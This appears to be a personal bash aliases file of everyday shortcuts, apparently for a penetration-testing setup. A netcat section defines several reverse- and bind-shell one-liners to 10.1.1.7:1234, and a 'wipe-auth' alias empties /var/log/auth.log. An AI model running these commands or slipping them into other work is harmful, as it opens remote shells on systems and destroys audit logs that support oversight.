#http://askubuntu.com/questions/22037/aliases-not-available-when-using-sudo
alias sudo="sudo "
alias br='source ~/.bashrc'
alias ports='netstat -tulanp'
alias now='date +"%T"'
alias nowtime='now'
alias nowdate='date +"%d-%m-%Y"'
alias checksum='rhash -r --md5 -p "%h, %p\n"'
alias beep='echo -e "\a\c"'
alias beep-lots='while :; do beep; sleep 1; done'

# updating stuff
alias update-sys='sudo apt-get update && sudo apt-get upgrade'
alias update-github='cleanup-github-stuff ; github-new-aliases ; github-new-vim ; distribute-github-stuff'
alias update-motd='sudo /usr/lib/update-notifier/update-motd-updates-available --force'

### Enhanced commands ###
alias ls="ls -hp --color=auto"
alias ll='ls -la'
alias l.='ls -d .* '                                            #Show hidden files
alias ldir='ls -d */'
alias ll="ls -la"
alias ls-size="ll -lAS && echo '-------------Smallest-----'"
alias ls-time="ls -lAt && echo '-------------Oldest-----'"
alias mkdir='mkdir -pv'                                         #create parent dirs on demand
alias chown='chown --preserve-root'
alias chmod='chmod --preserve-root'
alias chgrp='chgrp --preserve-root'
alias chmod-setgid='chmod g+s'
alias zip-dir='zip -r'
alias wget='wget -c'                                            #turn on wget resuming
alias wget-local='wget -p -k'
alias curl-follow='curl -O -J -L'
alias rsync-copy="rsync -avhP"
alias screen-name='screen -S'

alias outmail="mail -a\"From:`hostname`@nsecure.me\""

### Safer commands ###
alias mv='mv -i'
alias cp='cp -i'
alias ln='ln -i'
alias rm='rm -I --preserve-root'

# when you mess up and type your password in the terminal
alias clear-history='history -cw'
alias wipe-auth='sudo cat /dev/null | sudo tee /var/log/auth.log'
alias wipe-all='clear-history ; wipe-auth'

# trims front and back whitespace plus tabs
alias trim='awk '\''{$1=$1};1'\'''
alias fixcut='tr -s " "'

#cd aliases
alias cd..='cd ..'
alias ..='cd ..'
alias ...='cd ../../../'
alias ....='cd ../../../../'
alias .....='cd ../../../../'
alias .4='cd ../../../../'
alias .5='cd ../../../../..'
#alias cd_steam='cd ~/.wine32/drive_c/Program\ Files/Steam/'
#alias cd_steamgames='cd ~/.wine32/drive_c/Program\ Files/Steam/steamapps/common/'
#alias cd_progx86='cd ~/.wine32/drive_c/Program\ Files/'

### openssl shortcuts
alias sha1='openssl sha1'
alias md5='openssl md5'

### Pretty commands
alias vmount='mount |column -t'
alias vpath='echo -e ${PATH//:/\\n}'

### User Definitions ###
# compile with max debugging
alias gcc-dev="gcc -g -Wall -Wextra -Winline"
# Get your current public IP
alias whatismyip="curl icanhazip.com"
alias ipinfo="curl ifconfig.me && curl ifconfig.me/host"
alias ipconfig="nmcli dev list iface eth0 | grep IP4"
# count files in directory
alias dircount='ls -1 | wc -l'
alias webify="mogrify -resize 690\> *.png"
alias most='du -hsx * | sort -rh | head -10'
alias sort-dir-by-size='du -ha --max-depth=1 | sort -h'
alias find_by_name_indir='sudo find . -iname '
alias find_by_name_root='sudo find / -iname '
alias grep_for_text='grep -inrI '

### Shortcuts ###
alias h='history'
alias c='clear'
alias cls='clear'
alias dc='dircount'

### useless stuff ###
#alias lostterm='export PS1="\[\033[01;32m\]>: "'
alias busy="cat /dev/urandom | hexdump -C | grep 'ca fe'"

### netcat ###
alias nc-trad-rev='nc -e /bin/sh 10.1.1.7 1234'
alias nc-trad-bind='nc -e /bin/sh -l 1234'
alias nc-trad-rev='nc -e /bin/bash 10.1.1.7 1234'
alias nc-trad-rev='nc -e /bin/bash -l 1234'
alias nc-sh-rev='rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.1.1.7 1234 >/tmp/f'
alias nc-sh-bind='rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -l 1234 >/tmp/f'
alias nc-bash-rev='rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.1.1.7 1234 >/tmp/f'
alias nc-bash-bind='rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -l 1234 >/tmp/f'

alias hd-health='find /dev -regex "/dev/sd." -exec smartctl -l selftest {} \;'

### git ###
alias git-old-file='git checkout HEAD -- '
alias git-init='git config user.email tbennett6421@gmail.com && git config user.name "Tyler Bennett" && git config core.editor vim && git config diff.tool vimdiff && git config difftool.prompt false'

### Count lines of code
alias phplines-summary='( find ./ -name '*.php' -print0 | xargs -0 cat ) | wc -l'
alias phplines-verbose='find . -name '*.php' | xargs wc -l'

if [[ $(lsb_release -i) == *Kali* ]]
then
	alias nautilus='thunar'
fi
